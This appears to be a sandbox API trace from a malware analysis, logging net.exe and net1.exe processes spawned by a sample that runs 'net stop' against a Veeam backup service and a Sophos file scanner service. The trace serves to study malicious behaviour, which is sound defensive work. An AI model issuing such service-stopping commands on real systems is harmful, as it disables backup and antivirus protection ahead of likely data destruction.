[0210.203] _wcsicmp (_String1="server", _String2="VEEAMCLOUDSVC") returned -3 [0210.203] _wcsicmp (_String1="svr", _String2="VEEAMCLOUDSVC") returned -3 [0210.203] _wcsicmp (_String1="srv", _String2="VEEAMCLOUDSVC") returned -3 [0210.203] _wcsicmp (_String1="lanmanserver", _String2="VEEAMCLOUDSVC") returned -10 [0210.203] _wcsicmp (_String1="alerter", _String2="VEEAMCLOUDSVC") returned -21 [0210.203] _wcsicmp (_String1="netlogon", _String2="VEEAMCLOUDSVC") returned -8 [0210.203] NetServiceControl (in: servername=0x0, service="VEEAMCLOUDSVC", opcode=0x0, arg=0x0, bufptr=0xdfaa8 | out: bufptr=0xdfaa8) returned 0x889 [0210.204] wcscpy_s (in: _Destination=0xc1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.204] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0210.204] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc1b338, nSize=0x800, Arguments=0xc19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0210.206] GetFileType (hFile=0x26c) returned 0x3 [0210.206] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5a4000 [0210.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5a4000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0210.206] WriteFile (in: hFile=0x26c, lpBuffer=0x5a4000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdf9e8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9e8, lpOverlapped=0x0) returned 0 [0210.206] LocalFree (hMem=0x5a4000) returned 0x0 [0210.206] GetFileType (hFile=0x26c) returned 0x3 [0210.206] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a62a8 [0210.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0210.206] WriteFile (in: hFile=0x26c, lpBuffer=0x5a62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf9e8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9e8, lpOverlapped=0x0) returned 0 [0210.206] LocalFree (hMem=0x5a62a8) returned 0x0 [0210.206] _ultow (in: _Dest=0x889, _Radix=915992 | out: _Dest=0x889) returned="2185" [0210.206] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc1b338, nSize=0x800, Arguments=0xc19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0210.206] GetFileType (hFile=0x26c) returned 0x3 [0210.206] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5a62a8 [0210.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5a62a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0210.206] WriteFile (in: hFile=0x26c, lpBuffer=0x5a62a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdf9f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9f4, lpOverlapped=0x0) returned 0 [0210.206] LocalFree (hMem=0x5a62a8) returned 0x0 [0210.206] GetFileType (hFile=0x26c) returned 0x3 [0210.206] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a62a8 [0210.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a62a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0210.206] WriteFile (in: hFile=0x26c, lpBuffer=0x5a62a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf9f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdf9f4, lpOverlapped=0x0) returned 0 [0210.206] LocalFree (hMem=0x5a62a8) returned 0x0 [0210.207] NetApiBufferFree (Buffer=0x5a1c70) returned 0x0 [0210.207] NetApiBufferFree (Buffer=0x5a1c88) returned 0x0 [0210.207] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" [0210.207] exit (_Code=2) Process: id = "282" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c085000" os_pid = "0x5f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 455 os_tid = 0x4a0 Process: id = "283" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6c466000" os_pid = "0x24c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "282" os_parent_pid = "0x5f0" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 456 os_tid = 0x48c [0210.358] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fba8 | out: lpSystemTimeAsFileTime=0x20fba8*(dwLowDateTime=0x469316a0, dwHighDateTime=0x1d57a87)) [0210.358] GetCurrentProcessId () returned 0x24c [0210.358] GetCurrentThreadId () returned 0x48c [0210.358] GetTickCount () returned 0x116e2d1 [0210.358] QueryPerformanceCounter (in: lpPerformanceCount=0x20fba0 | out: lpPerformanceCount=0x20fba0*=33064241845) returned 1 [0210.358] GetModuleHandleA (lpModuleName=0x0) returned 0xbd0000 [0210.358] __set_app_type (_Type=0x1) [0210.358] __p__fmode () returned 0x74eb31f4 [0210.358] __p__commode () returned 0x74eb31fc [0210.358] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbdffe6) returned 0x0 [0210.358] __getmainargs (in: _Argc=0xbe9064, _Argv=0xbe906c, _Env=0xbe9068, _DoWildCard=0, _StartInfo=0xbe9024 | out: _Argc=0xbe9064, _Argv=0xbe906c, _Env=0xbe9068) returned 0 [0210.359] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.359] GetConsoleOutputCP () returned 0x1b5 [0210.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbe9080 | out: lpCPInfo=0xbe9080) returned 1 [0210.359] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.362] sprintf_s (in: _DstBuf=0x20fb60, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.362] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.364] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.364] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos File Scanner ServiceΓÇ¥ /y" [0210.364] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f92c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.364] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xa2) returned 0x263c48 [0210.364] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.364] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fb30 | out: Buffer=0x20fb30*=0x261ca8) returned 0x0 [0210.364] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20fb30 | out: Buffer=0x20fb30*=0x261cc0) returned 0x0 [0210.364] _fileno (_File=0x74eb2900) returned -2 [0210.364] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.365] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.365] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.365] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.365] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.365] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.365] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.365] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.365] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.365] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.365] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.365] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.365] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.365] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.365] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.365] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.365] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.365] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.365] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.365] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.365] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.365] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.365] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0210.365] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0210.365] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0210.365] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0210.365] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0210.365] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0210.365] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0210.365] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0210.365] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0210.365] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0210.365] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0210.365] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0210.366] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0210.366] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0210.366] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0210.366] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0210.366] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0210.366] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0210.366] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0210.366] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0210.366] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0210.366] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0210.366] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0210.366] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0210.366] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0210.366] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0210.366] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0210.366] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0210.366] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0210.366] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0210.366] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0210.366] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0210.366] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0210.366] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0210.367] _wcsicmp (_String1="accounts", _String2="File") returned -5 [0210.367] _wcsicmp (_String1="computer", _String2="File") returned -3 [0210.367] _wcsicmp (_String1="config", _String2="File") returned -3 [0210.367] _wcsicmp (_String1="continue", _String2="File") returned -3 [0210.367] _wcsicmp (_String1="cont", _String2="File") returned -3 [0210.367] _wcsicmp (_String1="file", _String2="File") returned 0 [0210.367] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.367] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.367] wcscpy_s (in: _Destination=0x20f630, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0210.367] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74a10000 [0210.368] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x20f62c, nSize=0x0, Arguments=0x20f628 | out: lpBuffer="器&neth.dll") returned 0xff [0210.369] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0210.369] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0210.369] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0210.370] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.370] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0210.370] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0210.370] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0210.370] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.370] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0210.370] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0210.370] _wcsicmp (_String1="CONT", _String2="File") returned -3 [0210.370] _wcsicmp (_String1="CONT", _String2="Scanner") returned -16 [0210.370] _wcsicmp (_String1="CONT", _String2="ServiceΓÇ¥") returned -16 [0210.370] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.370] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0210.370] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.370] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0210.370] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.370] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0210.370] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0210.370] _wcsicmp (_String1="FILES", _String2="File") returned 115 [0210.370] _wcsicmp (_String1="FILES", _String2="Scanner") returned -13 [0210.370] _wcsicmp (_String1="FILES", _String2="ServiceΓÇ¥") returned -13 [0210.370] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.370] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0210.370] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.370] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0210.370] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.370] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0210.370] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0210.370] _wcsicmp (_String1="GROUPS", _String2="File") returned 1 [0210.370] _wcsicmp (_String1="GROUPS", _String2="Scanner") returned -12 [0210.371] _wcsicmp (_String1="GROUPS", _String2="ServiceΓÇ¥") returned -12 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.371] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0210.371] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0210.371] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.371] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0210.371] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0210.371] _wcsicmp (_String1="REPL", _String2="File") returned 12 [0210.371] _wcsicmp (_String1="REPL", _String2="Scanner") returned -1 [0210.371] _wcsicmp (_String1="REPL", _String2="ServiceΓÇ¥") returned -1 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0210.371] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.371] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0210.371] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0210.371] _wcsicmp (_String1="REPLICATOR", _String2="File") returned 12 [0210.371] _wcsicmp (_String1="REPLICATOR", _String2="Scanner") returned -1 [0210.371] _wcsicmp (_String1="REPLICATOR", _String2="ServiceΓÇ¥") returned -1 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.371] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0210.371] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0210.371] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.371] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0210.371] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0210.371] _wcsicmp (_String1="SESSIONS", _String2="File") returned 13 [0210.371] _wcsicmp (_String1="SESSIONS", _String2="Scanner") returned 2 [0210.371] _wcsicmp (_String1="SESSIONS", _String2="ServiceΓÇ¥") returned 1 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0210.371] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.371] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0210.371] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0210.371] _wcsicmp (_String1="SESS", _String2="File") returned 13 [0210.371] _wcsicmp (_String1="SESS", _String2="Scanner") returned 2 [0210.371] _wcsicmp (_String1="SESS", _String2="ServiceΓÇ¥") returned 1 [0210.371] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.371] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0210.372] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0210.372] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.372] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0210.372] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0210.372] _wcsicmp (_String1="STATS", _String2="File") returned 13 [0210.372] _wcsicmp (_String1="STATS", _String2="Scanner") returned 17 [0210.372] _wcsicmp (_String1="STATS", _String2="ServiceΓÇ¥") returned 15 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.372] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0210.372] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0210.372] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.372] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0210.372] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0210.372] _wcsicmp (_String1="USERS", _String2="File") returned 15 [0210.372] _wcsicmp (_String1="USERS", _String2="Scanner") returned 2 [0210.372] _wcsicmp (_String1="USERS", _String2="ServiceΓÇ¥") returned 2 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0210.372] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0210.372] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0210.372] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0210.372] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0210.372] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0210.372] _wcsicmp (_String1="REDIRECTOR", _String2="File") returned 12 [0210.372] _wcsicmp (_String1="REDIRECTOR", _String2="Scanner") returned -1 [0210.372] _wcsicmp (_String1="REDIRECTOR", _String2="ServiceΓÇ¥") returned -1 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0210.372] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.372] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0210.372] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0210.372] _wcsicmp (_String1="REDIR", _String2="File") returned 12 [0210.372] _wcsicmp (_String1="REDIR", _String2="Scanner") returned -1 [0210.372] _wcsicmp (_String1="REDIR", _String2="ServiceΓÇ¥") returned -1 [0210.372] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0210.372] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.373] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0210.373] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0210.373] _wcsicmp (_String1="RDR", _String2="File") returned 12 [0210.373] _wcsicmp (_String1="RDR", _String2="Scanner") returned -1 [0210.373] _wcsicmp (_String1="RDR", _String2="ServiceΓÇ¥") returned -1 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0210.373] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.373] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0210.373] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0210.373] _wcsicmp (_String1="WORK", _String2="File") returned 17 [0210.373] _wcsicmp (_String1="WORK", _String2="Scanner") returned 4 [0210.373] _wcsicmp (_String1="WORK", _String2="ServiceΓÇ¥") returned 4 [0210.373] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0210.373] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0210.373] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0210.373] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 